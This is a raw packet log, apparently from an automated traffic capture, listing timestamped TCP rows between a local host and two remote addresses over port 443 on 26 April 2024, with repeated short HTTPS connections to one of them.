Apr 26, 2024 23:18:42.725086927 CEST	49766	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:18:42.725106001 CEST	443	49766	142.250.217.228	192.168.2.4
Apr 26, 2024 23:18:42.725512981 CEST	443	49766	142.250.217.228	192.168.2.4
Apr 26, 2024 23:18:42.727571011 CEST	49766	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:18:42.727737904 CEST	443	49766	142.250.217.228	192.168.2.4
Apr 26, 2024 23:18:42.831202030 CEST	49766	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:18:43.167716026 CEST	443	49765	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:43.167798996 CEST	49765	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:43.167819023 CEST	443	49765	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:43.167870045 CEST	49765	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:43.167876005 CEST	443	49765	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:43.167893887 CEST	443	49765	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:43.167972088 CEST	49765	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:43.168128967 CEST	49765	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:43.168145895 CEST	443	49765	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:43.264823914 CEST	49767	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:43.264889002 CEST	443	49767	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:43.265060902 CEST	49767	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:43.265345097 CEST	49767	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:43.265366077 CEST	443	49767	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:43.526879072 CEST	443	49767	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:43.527085066 CEST	49767	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:43.527592897 CEST	49767	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:43.527601004 CEST	443	49767	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:43.529293060 CEST	49767	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:43.529298067 CEST	443	49767	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:44.341008902 CEST	443	49767	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:44.341084003 CEST	443	49767	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:44.341248035 CEST	49767	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:44.342097998 CEST	49767	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:44.342128992 CEST	443	49767	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:44.545214891 CEST	49768	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:44.545263052 CEST	443	49768	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:44.545474052 CEST	49768	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:44.545646906 CEST	49768	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:44.545660019 CEST	443	49768	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:44.810672045 CEST	443	49768	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:44.810791969 CEST	49768	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:44.812553883 CEST	49768	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:44.812553883 CEST	49768	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:44.812563896 CEST	443	49768	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:44.812572956 CEST	443	49768	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:49.138472080 CEST	443	49768	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:49.138627052 CEST	49768	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:49.138648987 CEST	443	49768	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:49.138715029 CEST	443	49768	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:49.138885975 CEST	49768	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:49.139060020 CEST	49768	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:49.139077902 CEST	443	49768	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:49.336790085 CEST	49769	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:49.336831093 CEST	443	49769	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:49.336909056 CEST	49769	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:49.338100910 CEST	49769	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:49.338114977 CEST	443	49769	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:49.606602907 CEST	443	49769	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:49.606672049 CEST	49769	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:49.607219934 CEST	49769	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:49.607230902 CEST	443	49769	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:49.608870029 CEST	49769	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:49.608875990 CEST	443	49769	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:52.716000080 CEST	443	49766	142.250.217.228	192.168.2.4
Apr 26, 2024 23:18:52.716057062 CEST	443	49766	142.250.217.228	192.168.2.4
Apr 26, 2024 23:18:52.716165066 CEST	49766	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:18:53.710714102 CEST	443	49769	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:53.710784912 CEST	49769	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:53.710817099 CEST	443	49769	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:53.710864067 CEST	49769	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:53.710870981 CEST	443	49769	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:53.710912943 CEST	49769	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:53.711008072 CEST	49769	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:53.711076021 CEST	443	49769	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:53.711133003 CEST	49769	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:53.824116945 CEST	49770	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:53.824157000 CEST	443	49770	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:53.824230909 CEST	49770	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:53.824549913 CEST	49770	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:53.824563980 CEST	443	49770	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:54.094826937 CEST	443	49770	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:54.094911098 CEST	49770	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:54.098361969 CEST	49770	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:54.098376036 CEST	443	49770	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:54.099643946 CEST	443	49770	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:54.099710941 CEST	49770	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:54.100089073 CEST	49770	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:54.140146017 CEST	443	49770	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:58.214240074 CEST	443	49770	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:58.214327097 CEST	49770	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:58.214406013 CEST	443	49770	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:58.214437962 CEST	443	49770	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:58.214497089 CEST	49770	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:58.214498043 CEST	49770	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:58.214602947 CEST	49770	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:58.214633942 CEST	443	49770	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:58.323220015 CEST	49771	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:58.323304892 CEST	443	49771	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:58.323735952 CEST	49771	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:58.327208042 CEST	49771	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:58.327245951 CEST	443	49771	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:58.590176105 CEST	443	49771	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:58.590297937 CEST	49771	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:58.590857983 CEST	49771	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:58.590884924 CEST	443	49771	172.67.219.28	192.168.2.4
Apr 26, 2024 23:18:58.592379093 CEST	49771	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:18:58.592392921 CEST	443	49771	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:02.568974018 CEST	443	49771	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:02.569253922 CEST	443	49771	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:02.569303036 CEST	49771	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:02.573452950 CEST	49771	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:02.573452950 CEST	49771	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:02.685642958 CEST	49772	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:02.685698032 CEST	443	49772	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:02.689313889 CEST	49772	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:02.689673901 CEST	49772	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:02.689698935 CEST	443	49772	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:02.877276897 CEST	49771	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:02.877343893 CEST	443	49771	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:02.959853888 CEST	443	49772	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:02.959959984 CEST	49772	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:02.960514069 CEST	49772	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:02.960541964 CEST	443	49772	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:02.962055922 CEST	49772	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:02.962069988 CEST	443	49772	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:06.891865015 CEST	443	49772	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:06.891943932 CEST	49772	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:06.891972065 CEST	443	49772	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:06.892035007 CEST	49772	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:06.892201900 CEST	49772	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:06.892235041 CEST	443	49772	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:06.913557053 CEST	49773	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:06.913589001 CEST	443	49773	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:06.913690090 CEST	49773	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:06.913940907 CEST	49773	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:06.913948059 CEST	443	49773	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:07.178844929 CEST	443	49773	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:07.178904057 CEST	49773	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:07.179431915 CEST	49773	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:07.179447889 CEST	443	49773	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:07.180979013 CEST	49773	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:07.180984974 CEST	443	49773	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:07.181016922 CEST	49773	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:07.181036949 CEST	443	49773	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:14.666326046 CEST	443	49773	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:14.666403055 CEST	49773	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:14.666414976 CEST	443	49773	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:14.666461945 CEST	49773	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:14.666486025 CEST	443	49773	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:14.666532040 CEST	49773	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:14.666771889 CEST	49773	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:14.666790009 CEST	443	49773	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:14.782088041 CEST	49774	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:14.782144070 CEST	443	49774	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:14.782221079 CEST	49774	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:14.782517910 CEST	49774	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:14.782535076 CEST	443	49774	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:15.045922995 CEST	443	49774	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:15.045995951 CEST	49774	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:15.046487093 CEST	49774	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:15.046494007 CEST	443	49774	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:15.048212051 CEST	49774	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:15.048217058 CEST	443	49774	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:19.795778036 CEST	443	49774	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:19.795860052 CEST	49774	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:19.795885086 CEST	443	49774	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:19.795914888 CEST	443	49774	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:19.795945883 CEST	49774	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:19.796016932 CEST	49774	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:19.796160936 CEST	49774	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:19.796176910 CEST	443	49774	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:19.861804008 CEST	49775	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:19.861846924 CEST	443	49775	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:19.862492085 CEST	49775	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:19.862889051 CEST	49775	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:19.862905025 CEST	443	49775	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:20.140896082 CEST	443	49775	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:20.141448021 CEST	49775	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:20.143022060 CEST	49775	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:20.143022060 CEST	49775	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:20.143045902 CEST	443	49775	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:20.143069983 CEST	443	49775	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:23.910427094 CEST	443	49775	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:23.910516024 CEST	49775	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:23.910547018 CEST	443	49775	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:23.910653114 CEST	49775	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:23.910661936 CEST	443	49775	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:23.910706997 CEST	443	49775	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:23.910739899 CEST	49775	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:23.910804987 CEST	49775	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:23.910859108 CEST	49775	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:23.910873890 CEST	443	49775	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:24.035224915 CEST	49776	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:24.035280943 CEST	443	49776	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:24.035353899 CEST	49776	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:24.039233923 CEST	49776	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:24.039266109 CEST	443	49776	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:24.306912899 CEST	443	49776	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:24.307321072 CEST	49776	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:24.308873892 CEST	49776	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:24.308873892 CEST	49776	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:24.308907986 CEST	443	49776	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:24.308939934 CEST	443	49776	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:28.115518093 CEST	443	49776	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:28.115927935 CEST	443	49776	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:28.116084099 CEST	49776	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:28.118324995 CEST	49776	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:28.118345022 CEST	443	49776	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:28.255235910 CEST	49777	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:28.255270958 CEST	443	49777	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:28.257674932 CEST	49777	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:28.258059025 CEST	49777	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:28.258080006 CEST	443	49777	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:28.519707918 CEST	443	49777	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:28.519778967 CEST	49777	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:28.520381927 CEST	49777	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:28.520387888 CEST	443	49777	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:28.522397995 CEST	49777	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:28.522403955 CEST	443	49777	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:37.721438885 CEST	49766	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:19:37.721463919 CEST	443	49766	142.250.217.228	192.168.2.4
Apr 26, 2024 23:19:41.694283009 CEST	443	49777	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:41.694412947 CEST	443	49777	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:41.694562912 CEST	49777	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:41.694685936 CEST	49777	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:41.694699049 CEST	443	49777	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:41.865803957 CEST	49778	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:41.865849972 CEST	443	49778	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:41.865983963 CEST	49778	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:41.866219997 CEST	49778	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:41.866234064 CEST	443	49778	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:42.426590919 CEST	443	49778	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:42.426675081 CEST	49778	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:42.427256107 CEST	49778	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:42.427265882 CEST	443	49778	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:42.429100990 CEST	49778	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:42.429116011 CEST	443	49778	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:45.930427074 CEST	443	49778	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:45.930510044 CEST	49778	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:45.930530071 CEST	443	49778	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:45.930563927 CEST	443	49778	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:45.930634022 CEST	49778	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:45.930692911 CEST	49778	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:45.930771112 CEST	49778	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:45.930798054 CEST	443	49778	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:46.043251038 CEST	49779	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:46.043363094 CEST	443	49779	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:46.043488026 CEST	49779	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:46.047243118 CEST	49779	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:46.047281981 CEST	443	49779	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:46.307595968 CEST	443	49779	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:46.311454058 CEST	49779	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:46.313162088 CEST	49779	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:46.313162088 CEST	49779	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:46.313185930 CEST	443	49779	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:46.313249111 CEST	443	49779	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:50.466095924 CEST	443	49779	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:50.466156960 CEST	49779	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:50.466187000 CEST	443	49779	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:50.466211081 CEST	443	49779	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:50.466236115 CEST	49779	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:50.466263056 CEST	49779	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:50.466470003 CEST	49779	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:50.466491938 CEST	443	49779	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:50.569283009 CEST	49780	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:50.569318056 CEST	443	49780	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:50.569443941 CEST	49780	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:50.569737911 CEST	49780	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:50.569751024 CEST	443	49780	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:50.828223944 CEST	443	49780	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:50.828286886 CEST	49780	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:50.828701019 CEST	49780	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:50.828706980 CEST	443	49780	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:50.830195904 CEST	49780	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:50.830199957 CEST	443	49780	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:57.362991095 CEST	443	49780	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:57.363081932 CEST	49780	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:57.363123894 CEST	443	49780	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:57.363176107 CEST	49780	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:57.363207102 CEST	443	49780	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:57.363253117 CEST	49780	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:57.363266945 CEST	443	49780	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:57.363328934 CEST	49780	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:57.363328934 CEST	49780	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:57.363377094 CEST	443	49780	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:57.363405943 CEST	49780	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:57.363431931 CEST	49780	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:57.428749084 CEST	49781	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:57.428785086 CEST	443	49781	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:57.428854942 CEST	49781	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:57.429069996 CEST	49781	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:57.429084063 CEST	443	49781	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:57.692747116 CEST	443	49781	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:57.693165064 CEST	49781	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:57.693536043 CEST	49781	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:57.693542004 CEST	443	49781	172.67.219.28	192.168.2.4
Apr 26, 2024 23:19:57.694950104 CEST	49781	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:19:57.694953918 CEST	443	49781	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:02.222987890 CEST	443	49781	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:02.223123074 CEST	49781	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:02.223140001 CEST	443	49781	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:02.223263979 CEST	443	49781	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:02.223304987 CEST	49781	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:02.224044085 CEST	49781	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:02.224103928 CEST	49781	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:02.224116087 CEST	443	49781	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:02.337909937 CEST	49782	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:02.338013887 CEST	443	49782	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:02.338176012 CEST	49782	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:02.338483095 CEST	49782	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:02.338520050 CEST	443	49782	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:02.608009100 CEST	443	49782	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:02.608097076 CEST	49782	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:02.608596087 CEST	49782	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:02.608618975 CEST	443	49782	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:02.610330105 CEST	49782	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:02.610342979 CEST	443	49782	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:08.674037933 CEST	49766	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:20:08.674061060 CEST	443	49766	142.250.217.228	192.168.2.4
Apr 26, 2024 23:20:15.813210011 CEST	443	49782	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:15.813309908 CEST	49782	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:15.813374043 CEST	443	49782	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:15.813527107 CEST	443	49782	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:15.813657045 CEST	49782	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:15.813709974 CEST	49782	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:15.813743114 CEST	443	49782	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:15.867311001 CEST	49783	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:15.867337942 CEST	443	49783	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:15.867407084 CEST	49783	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:15.867594004 CEST	49783	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:15.867608070 CEST	443	49783	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:16.137608051 CEST	443	49783	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:16.137850046 CEST	49783	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:16.139271975 CEST	49783	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:16.139278889 CEST	443	49783	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:16.139599085 CEST	49783	443	192.168.2.4	172.67.219.28
